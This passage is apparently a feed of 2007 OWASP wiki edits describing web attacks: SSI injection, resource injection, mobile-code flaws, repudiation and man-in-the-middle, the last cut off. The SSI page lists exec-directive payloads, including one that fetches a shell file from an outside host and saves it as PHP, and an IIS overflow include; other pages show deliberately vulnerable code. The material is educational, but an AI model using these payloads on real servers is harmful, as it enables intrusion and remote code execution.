[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&amp;diff=23080</id>
		<title>Server-Side Includes (SSI) Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&amp;diff=23080"/>
				<updated>2007-11-05T17:14:25Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
SSIs are directives present on Web applications used to feed a HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some action before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. &lt;br /&gt;
&lt;br /&gt;
The Server-Side Include attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited thru manipulation of SSI in use on the application or forcing its use thru user input fields. &lt;br /&gt;
&lt;br /&gt;
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt; ! # = / . &amp;quot; - &amp;gt; and [a-zA-Z0-9] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.&lt;br /&gt;
&lt;br /&gt;
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under permission of web server process owner.&lt;br /&gt;
&lt;br /&gt;
The attack possibilities that the intruder can gain access sensitive information, as password files and execute shell commands. The SSIs directives are inject in input fields and they are sent to the web server. The web server parses and executes the directives, before supplying the page. Then, the attack result will be viewable the next time that the page will be loaded for user browser.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
== Examples ==&lt;br /&gt;
&lt;br /&gt;
=== Example 1===&lt;br /&gt;
&lt;br /&gt;
The commands used to inject SSI vary according to the server operational system in use.  The following commands represent the syntax that should be used to execute OS commands. &lt;br /&gt;
&lt;br /&gt;
'''Linux:'''&lt;br /&gt;
&lt;br /&gt;
List files of directory:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Access directories:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;!--#exec cmd=&amp;quot;cd /root/dir/&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Execution script:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;wget http://mysite.com/shell.txt | rename shell.txt shell.php&amp;quot; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Windows:'''&lt;br /&gt;
&lt;br /&gt;
List files of directory:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Access directories:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;cd C:\admin\dir&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
Other SSI examples that can be used to access and set server information:&lt;br /&gt;
&lt;br /&gt;
To change the error message output:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#config errmsg=&amp;quot;File not found, informs users and password&amp;quot;--&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To show current document filename:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#echo var=&amp;quot;DOCUMENT_NAME&amp;quot; --&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To show virtual path and filename:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#echo var=&amp;quot;DOCUMENT_URI&amp;quot; --&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#config timefmt=&amp;quot;A %B %d %Y %r&amp;quot;--&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Using the “fsize” command, it is possible to print the size of selected file:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#fsize file=&amp;quot;ssi.shtml&amp;quot; --&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 3===&lt;br /&gt;
&lt;br /&gt;
An old vulnerability in the IIS versions 4.0 and 5.0 allows that an attacker obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. &lt;br /&gt;
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].&lt;br /&gt;
&lt;br /&gt;
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack: &lt;br /&gt;
&lt;br /&gt;
ssi_over.shtml&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#include file=”UUUUUUUU...UU”--&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PS: The number of “U” needs to be longer than 2049.&lt;br /&gt;
 &lt;br /&gt;
Forcing application to load the ssi_over.shtml page:&lt;br /&gt;
&lt;br /&gt;
Non-malicious URL:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;www.vulnerablesite.org/index.asp?page=news.asp&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Malicious URL:&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://www.students.mines.edu/examples/  - CGI and SSI Examples&lt;br /&gt;
&lt;br /&gt;
http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Command Execution]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Code Injection]] &lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;diff=23079</id>
		<title>Mobile code: non-final public field</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;diff=23079"/>
				<updated>2007-11-05T17:14:24Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
This attack aims to manipulate non-final public variables used in mobile code by injecting malicious values on it, mostly in Java and C++ applications.&lt;br /&gt;
&lt;br /&gt;
When a public member variable or class used in mobile code isn’t declared as final, its values can be malicious manipulated by any function that has access to it in order to extend the application code or acquire critical information about the application.  &lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Low&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
A Java applet from certain application is acquired and subverted by an attacker. Then, he makes the victim accepts and runs a Trojan or malicious code that was prepared to manipulate non-final objects’  state and behavior. This code is instantiated and executed continuously using default JVM on victim’s machine. When the victim invokes the Java applet from the original application using the same JVM, the malicious process could be mixed with original applet, thus it modifies values of non-final objects and executes under victim’s credentials.&lt;br /&gt;
&lt;br /&gt;
In the following example, the class “any_class” is declared as final and  “server_addr” variable is not:&lt;br /&gt;
&lt;br /&gt;
 public final class any_class extends class_Applet {&lt;br /&gt;
 public URL server_addr;&lt;br /&gt;
 …&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
In this case, the value of “server_addr” variable could be set by any other function that has access to it, thus changing the application behavior.&lt;br /&gt;
A proper way to declare this variable is:&lt;br /&gt;
&lt;br /&gt;
 public class any_class extends class_Applet {&lt;br /&gt;
 public final URL server_addr;&lt;br /&gt;
 …&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
When a variable is declared as final its value cannot be modified.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
http://cwe.mitre.org/data/definitions/493.html – Mobile Code: non-final public field&lt;br /&gt;
http://www.fortifysoftware.com/vulncat/ - Unsafe Mobile Code: Access Violation&lt;br /&gt;
http://www.fortifysoftware.com/vulncat/ - Unsafe Mobile Code: Public finalize() Method&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category: Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[[Mobile code: invoking untrusted mobile code]]&lt;br /&gt;
*[[Mobile code: object hijack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category: Unsafe Mobile Code]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category: Access Control]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Abuse of Functionality]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Resource_Injection&amp;diff=23078</id>
		<title>Resource Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Resource_Injection&amp;diff=23078"/>
				<updated>2007-11-05T17:10:09Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
This attack consists in changing resources identifiers used by application in order to perform malicious task. When an application permits a user input to define a resource, like file name or port number, this data can be manipulated to execute or access different resources.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
In order to be properly executed, the attacker must have the possibility to specify a resource identifier thru application form and the application must permit its execution.&lt;br /&gt;
&lt;br /&gt;
The resource type affected by user input indicates the content type that may be exposed. For example, an application that permits input of special characters like period, slash, and backslash are risky when used in methods that interact with the file system.&lt;br /&gt;
&lt;br /&gt;
The resource injection attack focus on accessing other resources than local filesystem, whose is done thru a different attack technique known as [[Path Manipulation]] attack.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
The following examples represent an application which gets a port number from HTTP request and create a socket with this port number without any validation. A user using a proxy can modify this port and obtain a direct connection (socket) with the server.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Java code:'''&lt;br /&gt;
&lt;br /&gt;
 String rPort = request.getParameter(&amp;quot;remotePort&amp;quot;);&lt;br /&gt;
 ...&lt;br /&gt;
 ServerSocket srvr = new ServerSocket(rPort);&lt;br /&gt;
 Socket skt = srvr.accept(); &lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''.Net code:'''&lt;br /&gt;
&lt;br /&gt;
 int rPort = Int32.Parse(Request.get_Item(&amp;quot;remotePort &amp;quot;));&lt;br /&gt;
 ...&lt;br /&gt;
 IPEndPoint endpoint = new IPEndPoint(address,rPort);&lt;br /&gt;
 socket = new Socket(endpoint.AddressFamily, &lt;br /&gt;
 SocketType.Stream, ProtocolType.Tcp);&lt;br /&gt;
 socket.Connect(endpoint);&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
This example is same as previous, but it gets port number from CGI requests using C++:&lt;br /&gt;
&lt;br /&gt;
 char* rPort = getenv(&amp;quot;remotePort &amp;quot;);&lt;br /&gt;
 ...&lt;br /&gt;
 serv_addr.sin_port = htons(atoi(rPort));&lt;br /&gt;
 if (connect(sockfd,&amp;amp;serv_addr,sizeof(serv_addr)) &amp;lt; 0) &lt;br /&gt;
 error(&amp;quot;ERROR connecting&amp;quot;);&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
===Example 3===&lt;br /&gt;
This example in PLSQL / TSQL gets a URL path from a CGI and downloads the file contained on it. If a user modify the path or filename it’s possible to download arbitrary files from server:&lt;br /&gt;
 ...&lt;br /&gt;
 filename := SUBSTR(OWA_UTIL.get_cgi_env('PATH_INFO'), 2);&lt;br /&gt;
 WPG_DOCLOAD.download_file(filename); &lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
http://samate.nist.gov/SRD/view_testcase.php?login=Guest&amp;amp;tID=1734 &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/99.html &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/index.html#Definition &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://www.fortifysoftware.com/vulncat/ &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
G. Hoglund and G. McGraw. Exploiting Software. Addison-Wesley, 2004.&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category:Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
[[:Category: Information Disclosure]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[[Path Traversal]]&lt;br /&gt;
*[[Path Manipulation]]&lt;br /&gt;
*[[Relative Path Traversal]]&lt;br /&gt;
*[[:Category:Injection Attack | Injection Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Injection Attack]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;diff=23077</id>
		<title>Mobile code: invoking untrusted mobile code</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;diff=23077"/>
				<updated>2007-11-05T17:09:19Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
This attack consists on manipulation of a mobile code in order to execute malicious operations at the client side. By intercepting client traffic using “man-in-the-middle” technique, a malicious user could modify the original mobile code with arbitrary operations that will be executed on client’s machine under his credentials. &lt;br /&gt;
In other scenario, the malicious mobile code could be hosted in an untrustworthy web site or it could be permanently injected on a vulnerable web site thru an injection attack.&lt;br /&gt;
This attack can be performed over Java or C++ applications and affects any operational system.&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Low&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The following code demonstrates how this attack could be performed using a Java applet. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 // here declarer a object URL with the path of the malicious class&lt;br /&gt;
 URL[] urlPath= new URL[]{new URL(&amp;quot;file:subdir/&amp;quot;)};&lt;br /&gt;
&lt;br /&gt;
 // here generate a object “loader” which is responsible to load a class in the URL path&lt;br /&gt;
 URLClassLoader  classLoader = new URLClassLoader(urlPath); &lt;br /&gt;
&lt;br /&gt;
 //here declare a object of a malicious class contained in “classLoader”&lt;br /&gt;
 Class loadedClass = Class.forName(&amp;quot;loadMe&amp;quot;, true, classLoader);&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*https://buildsecurityin.us-cert.gov/daisy/bsi/100/version/1/part/4/data/CLASP_ApplicationSecurityProcess.pdf?branch=main&amp;amp;language=default  &lt;br /&gt;
*http://cwe.mitre.org/data/definitions/494.html&lt;br /&gt;
&lt;br /&gt;
==Related threats==&lt;br /&gt;
[[:Category: Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[[Mobile code: non-final public field]]&lt;br /&gt;
*[[Mobile code: object hijack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category: Unsafe Mobile Code]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
To solve this issue, it’s necessary to use some type of integrity mechanism to assure that the mobile code has not been modified.&lt;br /&gt;
&lt;br /&gt;
[[Category: Abuse of Functionality]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Repudiation_Attack&amp;diff=23076</id>
		<title>Repudiation Attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Repudiation_Attack&amp;diff=23076"/>
				<updated>2007-11-05T17:04:11Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Repudiation is the act of refuse authoring of something that happened. A repudiation attack happens when an application or system do not adopt controls to properly track and log users actions, thus permitting malicious manipulation or forging the identification of new actions.&lt;br /&gt;
This attack can be used to change the authoring information of actions executed by a malicious user in order to log wrong data to log files. Its usage can be extended to general data manipulation in name of others, in a similar manner as spoofing mails messages.&lt;br /&gt;
If this attack takes place, the data stored on log files can be considered invalid or misleading.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to Low&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
Consider a web application that makes access control and authorization based on SESSIONID, but register user actions based on user parameter defined on Cookie header, as follows:&lt;br /&gt;
&lt;br /&gt;
  POST &amp;lt;nowiki&amp;gt;http://someserver/Upload_file.jsp&amp;lt;/nowiki&amp;gt; HTTP/1.1&lt;br /&gt;
  Host: tequila:8443&lt;br /&gt;
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.4)   &lt;br /&gt;
  Gecko/20070515 Firefox/2.0.0.4&lt;br /&gt;
  Accept:&lt;br /&gt;
  text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5&lt;br /&gt;
  Accept-Language: en-us,en;q=0.5&lt;br /&gt;
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7&lt;br /&gt;
  Keep-Alive: 300&lt;br /&gt;
  Connection: keep-alive&lt;br /&gt;
  Referer: &amp;lt;nowiki&amp;gt;http://someserver/uploads.jsp&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  '''Cookie: JSESSIONID=EE3BD1E764CD6EED280426128201131C;  &lt;br /&gt;
  user=leonardo'''&lt;br /&gt;
  Content-Type: multipart/form-data; boundary=--------------------------- &lt;br /&gt;
  263152394310685&lt;br /&gt;
  Content-Length: 321&lt;br /&gt;
&lt;br /&gt;
And the log file is composed by:&lt;br /&gt;
&lt;br /&gt;
 Date, Time, Source IP, Source port, Request, User&lt;br /&gt;
&lt;br /&gt;
Once user information is acquired from user parameter on HTTP header, a malicious user could make use of a local proxy (eg:paros) and change it by a known or unknown username.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/definitions/93.html - Log Injection-Tampering-Forging&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Authorization]]&lt;br /&gt;
&lt;br /&gt;
[[:Category: Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Web Parameter Tampering]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Input Validation]]&lt;br /&gt;
&lt;br /&gt;
[[:Category: Access Control Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
[[:Category: Logging and Auditing Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Logging]]&lt;br /&gt;
&lt;br /&gt;
[[:Category: Access Control]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Resource Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23075</id>
		<title>Man-in-the-middle attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23075"/>
				<updated>2007-11-05T17:02:50Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Related Countermeasures */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.&lt;br /&gt;
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and  the attacker and the other between the attacker  and the server, as shown in figure 1. Once  the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:main_the_middle.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 1. Illustration of man-in-the-middle attack&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are  all ASCII based. This way, it’s possible to view and interview within the http protocol and  also in the data transferred. So, for example,  it’s possible to capture a session cookie reading the http header, but it’s also possible to change  an  amount of  money transaction inside the application context, as shown in figure 2.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:request.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The MITM attack could also be done over https connection by using the same technique, the only difference consists  in  the establishment of two independent SSL sessions, one over each TCP connection. The browser sets  a SSL connection with attacker and the attacker establishes  another SSL connection with the web server. In general the browser warns  the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.&lt;br /&gt;
&lt;br /&gt;
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.&lt;br /&gt;
&lt;br /&gt;
===MITM Attack tools===&lt;br /&gt;
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.&lt;br /&gt;
&lt;br /&gt;
*	PacketCreator&lt;br /&gt;
*	Ettercap&lt;br /&gt;
*	Dsniff&lt;br /&gt;
*	Cain e Abel&lt;br /&gt;
&lt;br /&gt;
===MITM Proxy only tools===&lt;br /&gt;
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser &lt;br /&gt;
&lt;br /&gt;
*	OWASP WebScarab&lt;br /&gt;
*	Paros Proxy&lt;br /&gt;
*	Burp Proxy&lt;br /&gt;
*	ProxyFuzz&lt;br /&gt;
*	Odysseus Proxy&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*http://www.sans.org/reading_room/whitepapers/threats/480.php&lt;br /&gt;
* http://cwe.mitre.org/data/definitions/300.html&lt;br /&gt;
*http://en.wikipedia.org/wiki/Mitm&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category:Authentication]]&lt;br /&gt;
&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
[[Man-in-the-browser_attack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Session Management Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
*[[Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Spoofing]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23074</id>
		<title>Man-in-the-middle attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23074"/>
				<updated>2007-11-05T17:01:42Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Related Attacks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.&lt;br /&gt;
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and  the attacker and the other between the attacker  and the server, as shown in figure 1. Once  the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:main_the_middle.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 1. Illustration of man-in-the-middle attack&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are  all ASCII based. This way, it’s possible to view and interview within the http protocol and  also in the data transferred. So, for example,  it’s possible to capture a session cookie reading the http header, but it’s also possible to change  an  amount of  money transaction inside the application context, as shown in figure 2.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:request.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
